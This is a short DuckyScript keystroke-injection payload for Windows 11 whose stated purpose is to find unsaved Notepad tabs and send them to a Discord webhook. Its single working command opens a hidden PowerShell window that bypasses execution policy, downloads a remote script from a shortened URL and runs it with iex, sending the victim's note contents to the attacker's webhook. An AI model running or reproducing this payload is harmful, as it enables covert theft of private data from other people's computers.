REM Title: beigeworm's Notepad Tabs to Discord Webhook.
REM Author: @beigeworm
REM Description: In Windows 11 notepad stores unsaved tabs for reopening notepad.... very unsafe. 
REM Description: This is a script to find any unsaved notes in notepad and send them to a discord webhook.
REM Target: Windows 11

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_nptabs_to_dc | iex
ENTER


